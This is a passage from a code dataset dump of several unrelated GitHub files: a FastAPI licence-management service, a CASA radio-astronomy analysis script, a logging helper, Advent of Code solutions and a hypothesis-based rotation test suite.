await database.execute(query)\n return ModuleDB(**dict({\"id\": module_id, **module.dict()}))\n\n\nasync def update_module(module_id: int, module: ModuleUpdate) -> ModuleDB:\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n query = modules.update().where(modules.c.id == module_id).values(**module.dict())\n await database.execute(query)\n return ModuleDB(**dict({\"id\": module_id, **module.dict()}))\n\n\nasync def delete_module(module_id: int) -> None:\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n query = modules.delete().where(modules.c.id == module_id)\n await database.execute(query)\n\n\nasync def get_licences_db() -> List[LicenceDB]:\n result = await database.fetch_all(query=licences.select())\n licences_list = []\n for licence in result:\n licences_list.append(LicenceDB(**dict(licence)))\n return licences_list\n\n\nasync def get_licences(last_id: int = 0, limit: int = 9) -> List[Licence]:\n query = licences.select().where(licences.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n licences_list = []\n for licence in result:\n licence = dict(licence)\n software = await get_software(licence[\"software_id\"])\n closed_vacancies = await get_count_employee_for_licence_id(licence[\"id\"])\n licences_list.append(Licence(**dict({**licence, \"software\": software, \"closed_vacancies\": closed_vacancies})))\n return licences_list\n\n\nasync def get_licence_page(last_id: int = 0, limit: int = 9) -> LicencePage:\n licences_list = await get_licences(last_id, limit)\n software_list = await get_software_db_list()\n return LicencePage(**dict({\"licences_list\": licences_list, \"software_list\": software_list}))\n\n\nasync def get_licence(licence_id: int) -> Optional[Licence]:\n result = await database.fetch_one(query=licences.select().where(licences.c.id == licence_id))\n if result is not None:\n licence = dict(result)\n software = await get_software(licence[\"software_id\"])\n closed_vacancies = await get_count_employee_for_licence_id(licence[\"id\"])\n return Licence(**dict({**licence, \"software\": software, \"closed_vacancies\": closed_vacancies}))\n return None\n\n\nasync def get_licence_db(licence_id: int) -> Optional[LicenceDB]:\n result = await database.fetch_one(licences.select().where(licences.c.id == licence_id))\n if result:\n return LicenceDB(**dict(result))\n return None\n\n\nasync def get_licence_by_number(licence_number: int) -> Optional[LicenceDB]:\n result = await database.fetch_one(licences.select().where(licences.c.number == int(licence_number)))\n if result:\n return LicenceDB(**dict(result))\n return None\n\n\nasync def add_licence(licence: LicenceCreate) -> LicenceDB:\n if await get_licence_by_number(licence.number):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_EXIST,\n )\n if await get_software(licence.software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = licences.insert().values(licence.dict())\n licence_id = await database.execute(query)\n return LicenceDB(**dict({\"id\": licence_id, **licence.dict()}))\n\n\nasync def update_licence(licence_id: int, licence: LicenceUpdate) -> LicenceDB:\n old_licence = await get_licence_db(licence_id)\n if old_licence is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n licence = dict(licence)\n old_licence = dict(old_licence)\n for field in licence:\n if licence[field]:\n old_licence[field] = licence[field]\n query = licences.update().where(licences.c.id == licence_id).values(**old_licence)\n result = await database.execute(query=query)\n return await get_licence_db(licence_id)\n\n\nasync def delete_licence(licence_id: int) -> None:\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n query = licences.delete().where(licences.c.id == licence_id)\n await database.execute(query)\n\n\nasync def get_count_employee_for_licence_id(licence_id: int) -> int:\n query = employee_licences.select().where(employee_licences.c.licence_id == licence_id)\n result = await database.fetch_all(query=query)\n return len(result)\n\n\nasync def get_free_vacancy_in_licence(licence_id: int) -> int:\n licence = await get_licence_db(licence_id)\n count_employees = await get_count_employee_for_licence_id(licence_id)\n if licence is not None:\n return licence.count_members - count_employees\n return 0\n\n\nasync def get_employee_licence(employee_id: str) -> Optional[LicenceDB]:\n query = employee_licences.select().where(employee_licences.c.employee_id == employee_id)\n result = await database.fetch_one(query=query)\n if result:\n employee_licence = dict(result)\n licence = await get_licence_db(employee_licence[\"licence_id\"])\n return licence\n return None\n\n\nasync def add_employee_licence(employee_id: str, licence_id: int) -> EmployeeLicenceDB:\n if await get_employee_licence(str(employee_id)):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.USER_HAS_ANOTHER_LICENCE,\n )\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n if await get_free_vacancy_in_licence(licence_id) <= 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_FULL,\n )\n employee_licence = EmployeeLicenceCreate(**dict({\"employee_id\": str(employee_id), \"licence_id\": licence_id}))\n query = employee_licences.insert().values(**employee_licence.dict())\n employee_licence_id = await database.execute(query)\n return EmployeeLicenceDB(**dict({\"id\": employee_licence_id, **employee_licence.dict()}))\n\n\nasync def update_employee_licence(employee_id: str, licence_id: int) -> EmployeeLicenceDB:\n if await get_free_vacancy_in_licence(licence_id) <= 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_FULL,\n )\n employee_licence = EmployeeLicenceUpdate(**dict({\"licence_id\": licence_id}))\n query = employee_licences.update().where(employee_licences.c.employee_id == employee_id).values(\n **employee_licence.dict())\n employee_licence_id = await database.execute(query)\n return EmployeeLicenceDB(**dict({\"id\": employee_licence_id, \"employee_id\": employee_id, **employee_licence.dict()}))\n\n\nasync def get_client_licence(client_id: int, licence_id: int) -> Optional[ClientLicenceDB]:\n query = client_licences.select().\\\n where((client_licences.c.client_id == client_id) & (client_licences.c.licence_id == licence_id))\n result = await database.fetch_one(query=query)\n if result:\n return ClientLicenceDB(**dict(result))\n return None\n\n\nasync def get_client_licences(client_id: int) -> List[Licence]:\n query = client_licences.select().where(client_licences.c.client_id == client_id)\n result = await database.fetch_all(query=query)\n client_licences_list = []\n for client_licence in result:\n client_licence = dict(client_licence)\n licence = dict(await get_licence_db(client_licence[\"licence_id\"]))\n closed_vacancies = await get_count_employee_for_licence_id(client_licence[\"licence_id\"])\n software = await get_software(licence[\"software_id\"])\n client_licences_list.append(\n Licence(**dict({**licence, \"closed_vacancies\": closed_vacancies, \"software\": software})))\n return client_licences_list\n\n\nasync def add_client_licence(client_id: int, licence_id: int) -> ClientLicenceDB:\n if await get_client_licence(client_id, licence_id) is not None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.CLIENT_HAS_THIS_LICENCE,\n )\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n client_licence = ClientLicenceCreate(**dict({\"client_id\": client_id, \"licence_id\": licence_id}))\n query = client_licences.insert().values(**client_licence.dict())\n employee_licence_id = await database.execute(query)\n client = await activate_client(client_id)\n return ClientLicenceDB(**dict({\"id\": employee_licence_id, **client_licence.dict()}))\n\n\nasync def activate_client(client_id: int) -> Optional[ClientDB]:\n current_client = await database.fetch_one(query=clients.select().where(clients.c.id == client_id))\n if current_client:\n current_client = dict(current_client)\n current_client[\"is_active\"] = True\n await database.execute(query=clients.update().where(clients.c.id == client_id).values(**current_client))\n return current_client\n","repo_name":"Crocodily-3-0/udv_service_desk","sub_path":"src/reference_book/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":17132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949449224","text":"import os\nimport sys\nimport re\nimport glob\nimport numpy as np\nimport scipy\nfrom astropy.coordinates import SkyCoord\nsys.path.append(os.getcwd() + \"/../\")\nimport mycasaanalysis_tools3 as myana\n\n\n#####################\n### parameters\n#####################\ndir_data = \"/Users/saito/data/myproj_published/proj_ts08_ngc3110/image_nyquist/\"\ntxt_flux = \"ngc3110_all_sum.txt\"\nra = \"10h04m02.090s\"\ndecl = \"-6d28m29.604s\"\nredshift = 0.016858\n\nrepimage = dir_data + \"../image_12co10/12co10.moment0\"\ntxt_tkin = dir_data+\"ngc3110_radex_tkin.txt\"\n\n\n#####################\n### def\n#####################\ndef degcoord(ra,decl):\n c = SkyCoord(ra, decl)\n ra_dgr = str(c.ra.degree)\n dec_dgr = str(c.dec.degree)\n\n return ra_dgr, dec_dgr\n\ndef distance_kpc(x1,y1,ra,decl,pa=171.,incl=65.,scale=0.325):\n ra_cnt, decl_cnt = degcoord(ra,decl)\n x2 = x1 - float(ra_cnt)\n y2 = y1 - float(decl_cnt)\n \n pa2 = pa * np.pi/180.\n incl2 = incl * np.pi/180.\n\n x3 = (x2*cos(pa2) - y2*sin(pa2)) / np.cos(incl2)\n y3 = x2*sin(pa2) + y2*cos(pa2)\n distance = np.sqrt(x3**2 + y3**2) * 3600. * scale\n\n return distance\n\ndef factor_b2m(Td):\n \"\"\"\n \"\"\"\n z = 0.016858\n h = 6.626e-27 # erg.s\n k = 1.38e-16 # erg/K\n nu_obs = 234.6075e+9 / (1 + z) #GHz\n alpha_850 = 6.7e+19\n \n factor = h * nu_obs * (1+z) / (k * Td)\n factor_0 = h * 352.6970094e+9 * (1+0) / (k * Td)\n gamma_rj = factor / (np.exp(factor) - 1)\n gamma_0 = factor_0 / (np.exp(factor_0) - 1)\n factor_b2m_tmp1 = 1.78 * (1+z)**-4.8 * (352.6970094/234.6075)**3.8\n factor_b2m_tmp2 = (69.4/1000.)**2 * 10.e+10\n factor_b2m_tmp3 = factor_b2m_tmp1 * factor_b2m_tmp2\n factor_b2m = factor_b2m_tmp3 * (6.7e+19/alpha_850) * gamma_0/gamma_rj\n \n return factor_b2m\n\ndef beam(imagename):\n \"\"\"\n for moment map creation\n \"\"\"\n major = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beammajor\")[\"value\"]\n minor = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beamminor\")[\"value\"]\n \n return major, minor\n\ndef beam_area(imagename):\n \"\"\"\n \"\"\"\n major = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beammajor\")[\"value\"]\n minor = imhead(imagename = imagename,\n mode = \"get\",\n hdkey = \"beamminor\")[\"value\"]\n pix = abs(imhead(imagename = imagename,\n mode = \"list\")[\"cdelt1\"])\n \n pixelsize = pix * 3600 * 180 / np.pi\n beamarea_arcsec = major * minor * np.pi/(4 * np.log(2))\n beamarea_pix = beamarea_arcsec / (pixelsize ** 2)\n \n return beamarea_pix\n\n#####################\n### Main Procedure\n#####################\n# import data\ndata = np.loadtxt(dir_data + txt_flux)\nx1 = data[:,0]\ny1 = data[:,1]\nfl_12co10 = data[:,2] # Jy/beam.km/s\nfl_band6 = data[:,9] # Jy/beam\n\n# import Tkin\nTkin = np.loadtxt(txt_tkin,usecols=(2,3))[:,0]\n\n# convert Jy/beam.km/s to K.km/s\nmajor, minor = beam(repimage)\nnu_obs_co10 = 115.27120 / (1 + redshift)\nbeta_co10 = 1.222e6 / major / minor / nu_obs_co10**2\nkelvin_12co10 = fl_12co10 * beta_co10\n\n# convert Jy/beam to Jy\nbeamarea_pix = beam_area(repimage)\nfl_band6_Jy = fl_band6 / beamarea_pix\n\n# radial distance\nr = distance_kpc(x1,y1,ra,decl)\n\n\n\"\"\"\n# measure column density using rotation diagram for 13CO\nproduct1 = dir_data + \"ngc3110_alpha_lte.txt\"\nos.system(\"rm -rf \" + product1)\nf = open(product1, \"w\")\nf.write(\"# x y distance alpha_lte(Trot) alpha_lte(Tkin)\\n\")\nf.close()\nfor i in range(len(kelvin_13co21)):\n logN_rot, Qrot = myana.rot0_13co(15.0, kelvin_13co21[i], data = \"../Qrot_CDMS.txt\")\n logN_kin, Qrot = myana.rot0_13co(Tkin[i], kelvin_13co21[i], data = \"../Qrot_CDMS.txt\")\n \n if fl_12co10[i] > 0:\n #\n NH2 = 10**logN_rot / X13co\n X_co = NH2 / kelvin_12co10[i]\n alpha_lte_Trot = 4.3 * X_co / 2e+20\n #\n NH2 = 10**logN_kin / X13co\n X_co = NH2 / kelvin_12co10[i]\n alpha_lte_Tkin = 4.3 * X_co / 2e+20\n else:\n alpha_lte_Trot = 0.0\n alpha_lte_Tkin = 0.0\n \n if Tkin[i]==0:\n alpha_lte_Tkin = 0.0\n \n f = open(product1, \"a\")\n f.write(str(x1[i]) + \" \" + str(y1[i]) + \" \" + str(r[i]) \\\n + \" \" + str(alpha_lte_Trot) + \" \" + str(alpha_lte_Tkin) + \"\\n\")\n f.close()\n\"\"\"\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_ts08_ngc3110/myim13_alpha_ism.py","file_name":"myim13_alpha_ism.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72155643369","text":"# -*- coding: utf-8 -*-\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport sys\n\n# logging config\nBASE_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef get_logger(splider_name):\n '''\n 日志路径在爬虫同目录的logs目录下\n 每个日志文件最多10M\n 错误日志单独提取一份\n '''\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n if logger.handlers:\n print(\"=====loger has handlers=====\")\n return logger\n\n formatter = logging.Formatter('%(asctime)s [%(levelname)-8s]: %(message)s')\n\n # handler_file_warning = logging.FileHandler(os.path.join(BASE_DIR,\"logs/%s.error.log\"%(\".\".join(splider_name.split('.')[:-1]))))\n handler_file_warning = RotatingFileHandler(os.path.join(BASE_DIR, \"logs/{}.error.log\".format(splider_name)),\n mode='a', maxBytes=10 * 1024 * 1024, backupCount=2, encoding=None,\n delay=0)\n handler_file_warning.setLevel(logging.WARNING)\n handler_file_warning.setFormatter(formatter)\n logger.addHandler(handler_file_warning)\n\n # handler_file_normal = logging.FileHandler(os.path.join(BASE_DIR,\"logs/%s.log\"%(\".\".join(splider_name.split('.')[:-1]))))\n handler_file_normal = RotatingFileHandler(os.path.join(BASE_DIR, \"logs/{}.log\".format(splider_name)),\n mode='a', maxBytes=10 * 1024 * 1024, backupCount=5, encoding=None,\n delay=0)\n handler_file_normal.setLevel(logging.DEBUG)\n handler_file_normal.setFormatter(formatter)\n logger.addHandler(handler_file_normal)\n\n handler_console = logging.StreamHandler(sys.stdout)\n handler_console.formatter = formatter\n logger.addHandler(handler_console)\n\n return logger\n\nif __name__ == \"__main__\":\n print(BASE_DIR)\n","repo_name":"goddessofpom/POM-crawler","sub_path":"component/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26487882516","text":"import collections\nimport sys\nfrom helperfunc import *\n\n\ndef prepare_input(input_file):\n lines = read_input_lines(input_file)\n split = lines.index('')\n length = int((len(lines[split-1])+1)/4)\n stacks = []\n for i in range(length):\n stacks.append(collections.deque())\n for i in range(split-2, -1, -1):\n for j in range(int((len(lines[i])+1)/4)):\n value = lines[i][j*4+1]\n if value != ' ':\n stacks[j].append(value)\n moves = []\n for i in range(split+1, len(lines)):\n moves.append([int(elem) for elem in lines[i].split(' ') if elem.isnumeric()])\n return stacks, moves\n\n\ndef part1(input_tuple):\n stacks, moves = input_tuple\n for move in moves:\n for j in range(move[0]):\n stacks[move[2]-1].append(stacks[move[1]-1].pop())\n res = \"\"\n return res.join(([stack.pop() for stack in stacks]))\n\n\ndef part2(input_tuple):\n stacks, moves = input_tuple\n for move in moves:\n temp = collections.deque()\n for j in range(move[0]):\n temp.append(stacks[move[1] - 1].pop())\n for j in range(move[0]):\n stacks[move[2]-1].append(temp.pop())\n res = \"\"\n return res.join(([stack.pop() for stack in stacks]))\n\n\ndef main() -> None:\n if len(sys.argv) > 2:\n input_file = sys.argv[2]\n else:\n input_file = '../input/'+sys.argv[0][:-3]+'.txt'\n if sys.argv[1] == '1':\n print(part1(prepare_input(input_file)))\n elif sys.argv[1] == '2':\n print(part2(prepare_input(input_file)))\n else:\n raise Exception(\"Please clarify, which part you wanna execute.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Godototot/AoC22","sub_path":"code/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25243243733","text":"from __future__ import annotations\n\nimport argparse\nimport heapq\nimport os.path\nfrom collections import defaultdict\nfrom string import ascii_lowercase\n\nimport networkx as nx\nimport pytest\n\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\n\ndef compute(s: str) -> int | None:\n start = end = (0, 0)\n\n lines = s.splitlines()\n size_x, size_y = len(lines), len(lines[0])\n\n # Get start and end position and normalize values.\n cells = {}\n for x, line in enumerate(lines):\n for y, letter in enumerate(line):\n if letter == \"E\":\n letter = \"z\"\n end = (x, y)\n if letter == \"S\":\n letter = \"a\"\n start = (x, y)\n cells[(x, y)] = ascii_lowercase.index(letter)\n\n # Compute possible moves from every position.\n moves = defaultdict(list)\n for (x, y), value in cells.items():\n if (y < size_y - 1) and (value - cells[x, y + 1]) >= -1:\n moves[(x, y)].append((0, 1))\n\n if (y > 0) and (value - cells[x, y - 1]) >= -1:\n moves[(x, y)].append((0, -1))\n\n if (x < size_x - 1) and (value - cells[x + 1, y]) >= -1:\n moves[(x, y)].append((1, 0))\n\n if (x > 0) and (value - cells[x - 1, y]) >= -1:\n moves[(x, y)].append((-1, 0))\n\n # Dijkstra shortest path implementation using heapq\n seen = set()\n todo = [(0, start)]\n\n while todo:\n cost, point = heapq.heappop(todo)\n\n if point == end:\n return cost\n elif point in seen:\n continue\n else:\n seen.add(point)\n\n for possible_move in moves[point]:\n next_place = point[0] + possible_move[0], point[1] + possible_move[1]\n if cells[next_place] - cells[point] <= 1:\n heapq.heappush(todo, (cost + 1, next_place))\n\n\ndef compute_nx(s: str) -> int:\n # Actually 2x slower due to the Graph building part\n start = end = (0, 0)\n\n lines = s.splitlines()\n size_x, size_y = len(lines), len(lines[0])\n\n # Get start and end position and normalize values.\n cells = {}\n for x, line in enumerate(lines):\n for y, letter in enumerate(line):\n if letter == \"E\":\n letter = \"z\"\n end = (x, y)\n if letter == \"S\":\n letter = \"a\"\n start = (x, y)\n cells[(x, y)] = ascii_lowercase.index(letter)\n\n # Build a graph from all possible edges\n G = nx.DiGraph()\n for (x, y), value in cells.items():\n if (y < size_y - 1) and (value - cells[x, y + 1]) >= -1:\n G.add_edge((x, y), (x, y + 1))\n\n if (y > 0) and (value - cells[x, y - 1]) >= -1:\n G.add_edge((x, y), (x, y - 1))\n\n if (x < size_x - 1) and (value - cells[x + 1, y]) >= -1:\n G.add_edge((x, y), (x + 1, y))\n\n if (x > 0) and (value - cells[x - 1, y]) >= -1:\n G.add_edge((x, y), (x - 1, y))\n\n return nx.dijkstra_path_length(G, source=start, target=end)\n\n\nINPUT_S = \"\"\"\\\nSabqponm\nabcryxxl\naccszExk\nacctuvwj\nabdefghi\n\"\"\"\nEXPECTED = 31\n\n\n@pytest.mark.parametrize(\n (\"input_s\", \"expected\"),\n ((INPUT_S, EXPECTED),),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\n@pytest.mark.parametrize(\n (\"input_s\", \"expected\"),\n ((INPUT_S, EXPECTED),),\n)\ndef test2(input_s: str, expected: int) -> None:\n assert compute_nx(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n args = parser.parse_args()\n\n with open(args.data_file) as f, support.timing():\n print(compute(f.read()))\n\n with open(args.data_file) as f, support.timing():\n print(compute_nx(f.read()))\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"UnknownPlatypus/AOC2022","sub_path":"day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19986322029","text":"from ErnosCube.rotation_enum import RotationEnum\nfrom hypothesis import given\nfrom hypothesis.strategies import data\nfrom copy import deepcopy\nfrom pytest import mark, raises\n\n\nclass PlaneRotatableTests:\n \"\"\"A test suite of tests for classes that inherit `PlaneRotatable`.\n\n This class implements a suite of propery based tests that all\n `PlaneRotatable` objects are expected to pass. A test suite for a specific\n rotatable class can incorporate this tests by inheriting this class and\n specifying the member variable `objs`, `objs_minus_c4`, and `objs_minus_c2`\n with hypothesis strategies, and implementing the methods\n `construction_test`, `rotate_cw_test`, `rotate_ccw_test`, and\n `rotate_ht_test`.\n\n The design is such that once each of the rotation methods are sufficiently\n tested for some ground case(s) in `rotate_*_test`, then the property based\n tests implemented with hypothesis will provide additional confidence about\n the correctness of the `rotate_*` methods. It is recognized that\n exhaustively testing the object space of a `PlaneRotatable` class is not\n desirable, or practical. The implementations of each `rotate_*_test` should\n be as straightforward and hard coded as possible. Only a few example cases\n are recommended (although, one could implement an exhaustive test suite in\n this method, if desired). This class makes it sufficient to have only a\n few, hand-selected examples tested so that one can have confidence that the\n methods `rotate_*` are working properly.\n\n Hypothesis does the heavy lifting by sampling the object space, and\n revealing any unexpected behavior that is encountered. For more information\n about hypothesis see:\n https://hypothesis.readthedocs.io/en/latest/index.html\n\n The strategy for `objs` should cover as much of object space for the\n `PlaneRotatable` class as practical. This will ensure a wide test coverage\n and increase the chance of an obscure bug being caught.\n\n The strategy for `objs_minus_c4` should produce arbitrary rotatable objects\n that are not in the `C_4` group. In other words, the generated rotatable\n objects from this strategy should not have 90-degree rotational symmetry.\n Similarly, `objs_minus_c2` should produce rotatable objects that are not in\n the `C_2` group (i.e. they do not have 180-degree symmetry).\n See: https://en.wikipedia.org/wiki/Rotational_symmetry#Discrete_rotational_symmetry\n\n Neither of the `objs_minus_*` strategies should use the `rotate_*` methods\n in their definition. The intent of these strategies is to test the\n properies of the `rotate_*` methods. If one uses `rotate_*` in the\n definition of a strategy it might lead to a false sense of assurance in the\n correctness of each method's implementations. Since `C_2` is a superset of\n `C_4`, `objs_minus_c2` may be used to generate `objs_minus_c4` using the\n `one_of` strategy from hypothesis. E.g. create `objs_minus_c2` and\n `c2_minus_c4`. Then, `objs_minus_c4 = one_of(objs_minus_c2, c2_minus_c4)`.\n\n It is anticipated that the specification of the `rotatable_objs_minus_*`\n strategies might be tedious without the use of the `rotate_*` functions.\n So, it is recommended that a subset of the many possible rotatable objects\n are hard coded into the strategy definitions.\n \"\"\"\n\n objs = None\n objs_minus_c2 = None\n objs_minus_c4 = None\n\n @mark.dependency(name=\"construction\")\n def test_construction(self):\n self.construction_test()\n\n def construction_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_cw\", depends=[\"construction\"])\n def test_rotate_cw(self):\n self.rotate_cw_test()\n\n def rotate_cw_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_ccw\", depends=[\"construction\"])\n def test_rotate_ccw(self):\n self.rotate_ccw_test()\n\n def rotate_ccw_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"rotate_ht\", depends=[\"construction\"])\n def test_rotate_ht(self):\n self.rotate_ht_test()\n\n def rotate_ht_test(self):\n assert False, \"not implemented\"\n\n @mark.dependency(name=\"objs\")\n def test_objs_def(self):\n assert self.objs is not None\n\n @mark.dependency(name=\"objs_minus_c2\")\n def test_objs_minus_c2(self):\n assert self.objs_minus_c2 is not None\n\n @mark.dependency(name=\"objs_minus_c4\")\n def test_objs_minus_c4(self):\n assert self.objs_minus_c4 is not None\n\n @mark.dependency(name=\"deepcopy\", depends=[\"construction\", \"objs\"])\n @given(data())\n def test_deepcopy(self, data):\n obj = data.draw(self.objs)\n deepcopy(obj)\n\n @mark.dependency(name=\"equality\", depends=[\"deepcopy\"])\n @given(data())\n def test_equality(self, data):\n obj = data.draw(self.objs)\n assert obj == obj, f\"failed for {str(obj)}\\n{repr(obj)}\"\n obj_copy = deepcopy(obj)\n assert obj == obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(name=\"inequality\", depends=[\"equality\"])\n @given(data())\n def test_inequality(self, data):\n a = data.draw(self.objs)\n b = data.draw(self.objs)\n if a == b:\n assert (\n not a != b\n ), f\"failed for {str(a)}\\n{repr(a)}\\nand {str(b)}\\n{repr(b)}\"\n else:\n assert a != b, f\"failed for {str(a)}\\n{repr(a)}\\nand {str(b)}\\n{repr(b)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\"])\n @given(data())\n def test_cw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n obj = obj.rotate_cw().rotate_cw().rotate_cw().rotate_cw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ccw\"])\n @given(data())\n def test_ccw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n obj = obj.rotate_ccw().rotate_ccw().rotate_ccw().rotate_ccw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ht\"])\n @given(data())\n def test_ht_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n assert (\n obj.rotate_ht().rotate_ht() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_cw_ccw_invertability(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj)\n assert (\n obj.rotate_cw().rotate_ccw() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n assert (\n obj.rotate_ccw().rotate_cw() == gold\n ), f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ht\"])\n @given(data())\n def test_ht_2cw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_cw().rotate_cw()\n obj = obj.rotate_ht()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_ccw\", \"rotate_ht\"])\n @given(data())\n def test_ht_2ccw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_ccw().rotate_ccw()\n obj = obj.rotate_ht()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_3cw_ccw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_ccw()\n obj = obj.rotate_cw().rotate_cw().rotate_cw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"equality\", \"rotate_cw\", \"rotate_ccw\"])\n @given(data())\n def test_3ccw_cw_equivalence(self, data):\n obj = data.draw(self.objs)\n gold = deepcopy(obj).rotate_cw()\n obj = obj.rotate_ccw().rotate_ccw().rotate_ccw()\n assert obj == gold, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c4\", \"inequality\", \"rotate_cw\"])\n @given(data())\n def test_cw_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c4)\n obj_copy = deepcopy(obj).rotate_cw()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c4\", \"inequality\", \"rotate_ccw\"])\n @given(data())\n def test_ccw_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c4)\n obj_copy = deepcopy(obj).rotate_ccw()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(depends=[\"objs_minus_c2\", \"inequality\", \"rotate_ht\"])\n @given(data())\n def test_ht_non_idempotence(self, data):\n obj = data.draw(self.objs_minus_c2)\n obj_copy = deepcopy(obj).rotate_ht()\n assert obj != obj_copy, f\"failed for {str(obj)}\\n{repr(obj)}\"\n\n @mark.dependency(\n depends=[\n \"equality\",\n \"deepcopy\",\n \"rotate_cw\",\n \"rotate_ccw\",\n \"rotate_ht\",\n \"objs_minus_c2\",\n ]\n )\n @given(data())\n def test_get_iso_transform(self, data):\n a = data.draw(self.objs_minus_c2)\n\n b = deepcopy(a)\n assert a == b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.NOTHING, err_str\n\n b = deepcopy(a).rotate_cw()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.CW, err_str\n\n b = deepcopy(a).rotate_ccw()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.CCW, err_str\n\n b = deepcopy(a).rotate_ht()\n assert a != b\n transformation = a.get_iso_transform(b)\n err_str = f\"{a}:\\n{repr(a)}\\n{transformation}\"\n assert transformation == RotationEnum.HT, err_str\n\n c = data.draw(self.objs_minus_c4)\n transformation = a.get_iso_transform(c)\n err_str = 